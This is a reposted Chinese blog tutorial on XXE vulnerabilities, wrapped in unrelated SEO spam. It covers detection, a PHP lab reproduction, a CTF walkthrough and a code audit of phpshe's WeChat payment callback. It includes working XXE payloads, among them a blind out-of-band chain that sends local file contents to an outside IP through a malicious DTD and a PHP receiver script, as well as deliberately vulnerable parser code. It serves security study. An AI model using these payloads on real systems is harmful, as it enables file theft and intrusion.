当前位置: 首页 > news >正文

微信app开发价格表郑州seo优化培训

微信app开发价格表,郑州seo优化培训,仿网站建设教程视频教程,天津网站建设中心在网络安全领域#xff0c;XML外部实体#xff08;XXE#xff09;漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用#xff0c;XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件#xff0c;可能成为攻击者入侵系统的利器。因此#xff0c…在网络安全领域XML外部实体XXE漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件可能成为攻击者入侵系统的利器。因此理解XXE漏洞的原理并掌握其复现与代码审计技巧对于提升系统安全性至关重要。 本文将深入剖析XXE漏洞的工作原理展示如何在实际环境中复现该漏洞并提供详尽的代码审计方法。无论您是网络安全初学者还是资深开发者都能从中获得实用的知识和技能。让我们一起解密XXE漏洞提升我们的安全防护能力。 基本原理 XML 文档可以包含实体 (Entity)实体可以是内部的定义在文档内部或外部的引用外部资源。外部实体通常用于在 XML 文档中包含外部数据。如果 XML 解析器允许解析外部实体那么攻击者可以利用这一点来执行恶意操作。 XXE发现 黑盒 获取得到Content-Type或数据类型为xml时尝试进行xml语言payload进行测试不管获取的Content—Type类型或数据传输类型均可尝试修改后提交测试xxeXXE不仅在数据传输上可能存在漏洞同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行 白盒 可通过应用功能追踪代码定位审计可通过脚本特定函数搜索定位审计可通过伪协议玩法绕过相关修复等 XXE~payload 读取文件 ?xml version1.0?!DOCTYPE Mikasa [!ENTITY test SYSTEM file:///d:/e.txt]userusernametest;/usernamepasswordMikasa/password/user带外测试 ?xml version1.0?!DOCTYPE test [!ENTITY % file SYSTEM http://7drrcs.dnslog.cn%file;]userusernamesend;/usernamepasswordMikasa/password/user引用外部实体dtd ?xml version1.0 ?!DOCTYPE test [!ENTITY % file SYSTEM http://127.0.0.1/evil2.dtd%file;]userusernamesend;/usernamepasswordMikasa/password/user-----------------------------------------------------------------------------evil2.dtd!ENTITY send SYSTEM file:///d:/1/1.txt无回显读文件-带外 ?xml version1.0?!DOCTYPE ANY [!ENTITY % file SYSTEM file:///d:/e.txt!ENTITY % remote SYSTEM http://47.94.236.117/test.dtd%remote;%all;]rootsend;/root-------------------------------------------------------------------------------服务端test.dtd!ENTITY % all !ENTITY send SYSTEM http://47.94.236.117/get.php?file%file;get.php?php$data $_GET[file];$myfile fopen(file.txt, w);fwrite($myfile, $data);fclose($myfile);?复现 **复现文件**​php_xxe.zip 读取文件 源码 doLogin.php?php$USERNAME admin; //账号$PASSWORD admin; //密码$result null;libxml_disable_entity_loader(false);$xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);}}catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage());}header(Content-Type: text/html; charsetutf-8);echo $result;?捉取登录框的数据包替换数据包内容即可 带外测试 源码 ?php $USERNAME admin; //账号 $PASSWORD admin; //密码 $result null;libxml_disable_entity_loader(false); $xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){//$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{//$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);} }catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage()); }header(Content-Type: text/html; charsetutf-8); echo $result; ?捉取数据包替换其内容即可 外部实体引用 源码同上 本地有一个dtd文件evil2.dtd内容为 !ENTITY send SYSTEM file:///d:/1/1.txt 捉包改包来引用他 无回显带外 源码 ?php $USERNAME admin; //账号 $PASSWORD admin; //密码 $result null;libxml_disable_entity_loader(false); $xmlfile file_get_contents(php://input);try{$dom new DOMDocument();$dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds simplexml_import_dom($dom);$username $creds-username;$password $creds-password;if($username $USERNAME $password $PASSWORD){//$result sprintf(resultcode%d/codemsg%s/msg/result,1,$username);}else{//$result sprintf(resultcode%d/codemsg%s/msg/result,0,$username);} }catch(Exception $e){$result sprintf(resultcode%d/codemsg%s/msg/result,3,$e-getMessage()); }header(Content-Type: text/html; charsetutf-8); echo $result; ?在服务端部署evil2.dtd和get.php ?xml version1.0?!DOCTYPE ANY[!ENTITY % file SYSTEM file:///d:/1/1.txt!ENTITY % remote SYSTEM http://43.139.186.80/evil2.dtd%remote;%all;]rootsend;/root---------------------------------------------服务端evil2.dtd!ENTITY % all !ENTITY send SYSTEM http://43.139.186.80/get.php?file%file;get.php?php$data $_GET[file];$myfile fopen(file.txt, w);fwrite($myfile, $data);fclose($myfile);?捉包替换数据包内容将1.txt的内容带到服务端 CTF赛题 前端代码 靶场地址http://web.jarvisoj.com:9882/htmlheadlink href//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/css/bootstrap-editable.css relstylesheet/script src//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/js/bootstrap-editable.min.js/script/headbodydiv classshowtextarea idtip-area width100px height50px disabled/textarea/divdiv classcontrol-areainput idevil-input typetext width100px height50px valuetype sth!/button classbtn btn-default typebutton onclicksend()Go!/button/divscriptfunction XHR() {var xhr;try {xhr new XMLHttpRequest();}catch(e) {var IEXHRVers [Msxml3.XMLHTTP,Msxml2.XMLHTTP,Microsoft.XMLHTTP];for (var i0,lenIEXHRVers.length;i len;i) {try {xhr new ActiveXObject(IEXHRVers[i]);}catch(e) {continue;}}}return xhr;}function send(){evil_input document.getElementById(evil-input).value;var xhr XHR();xhr.open(post,/api/v1.0/try,true);xhr.onreadystatechange function () {if (xhr.readyState4 xhr.status201) {data JSON.parse(xhr.responseText);tip_area document.getElementById(tip-area);tip_area.value data.task.searchdata.task.value;}};xhr.setRequestHeader(Content-Type,application/json);xhr.send({search:evil_input,value:own});}/script/body/html//可以看到XMLHttpRequest猜测存在xxe漏洞·捉取数据包并修改内容和类型 POST /api/v1.0/try HTTP/1.1 Host: web.jarvisoj.com:9882 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 Accept-Encoding: gzip, deflate Content-Type: application/xml;charsetutf-8 Referer: http://web.jarvisoj.com:9882/ Content-Length: 108 DNT: 1 Connection: close?xml version 1.0? !DOCTYPE ANY [!ENTITY f SYSTEM file:///home/ctf/flag.txt ] xf;/x代码审计流程 源码链接https://pan.baidu.com/s/15O6Hf2tM90T3ZEp9E2x_Ew?pwdcong 过程 首先放入审计系统 搜索可疑xxe函数simplexml_load_string 看到敏感可疑函数最终pe_getxml函数的调用 最终到wechat_getxml继续全局搜索最终 最后追踪到这个路径D:\phpstudy_pro\WWW\phpshe\include\plugin\payment\wechat\notify_url.php 在网站上访问并测试是否存在漏洞 发现xxe漏洞因为通过源码发现他的返回结果是固定的所以利用无回显文件外带即可任意读取 通过本次学习我们不仅深入了解了XXE漏洞的原理还掌握了复现该漏洞的具体步骤和代码审计的方法。安全防护不仅是技术问题更是一种意识和态度。通过对XXE漏洞的全面剖析我们能够更好地识别和修复潜在的安全风险从而保护我们的系统和数据安全。 在信息安全的道路上没有终点。希望本文能为您在安全防护方面提供有价值的指导和帮助激发您对网络安全的持续关注和兴趣。让我们共同努力构建一个更为安全的网络环境。如果您有任何疑问或宝贵的建议欢迎在评论区与我们互动。感谢您的阅读期待您的反馈与分享
http://www.tj-hxxt.cn/news/225484.html

相关文章:

  • 四川省住房城乡建设厅网站桂林两江四湖在哪里
  • 个人微信网站建设网站开发需求预算
  • 网站建设宣传海报369网站建设
  • 网站设计论文的摘要自己做的相册网站
  • 个人网站备案类型淘宝客网站可以做百度推广
  • 如何招网站开发人员搜狗推广后台登录
  • 苏州住房建设局网站html做电子书网站
  • 免费个人网站自助建设企业主页制作方法
  • 网站开发新闻怎么写ppt万能模板免费下载
  • 创建个人网站的流程广州网络营销公司排名
  • 如何做解析网站wordpress菜单如何做
  • 北京平台网站建设哪里好手机网站打开很慢
  • 专门做app的原型网站家在深圳歌词
  • 固安做网站什么网站做的最好
  • 网站模板用什么软件做宣传册设计与制作模板免费
  • 潍坊公司注册网站建筑行业网站有哪些
  • 定制型网站制作哪家好广告设计需要什么学历
  • 朝阳企业网站建设方案省厅建设信息网网站
  • 做一张简单的app网站多钱手机网站常用代码
  • 高清logo网站网站维护建设招标
  • 坑梓网站建设咨询广州市 优化推广
  • 网站架构的优化涡阳哪里有做网站的
  • 网站开发周期定义郑州网站建设微信小程序
  • iis 新建网站 要登录物流网站哪个好
  • 东兴网站建设做网站项目前怎么收集需求
  • wordpress喜欢seo引擎优化专员
  • 自适应网站系统吗php网站 mysql数据库配置文件
  • 做网站群的公司一键建站哪家信誉好
  • 百度搜索不到自己的网站做网页公司
  • 河南省建设工程标准定额管理网站做化妆品销售网站如何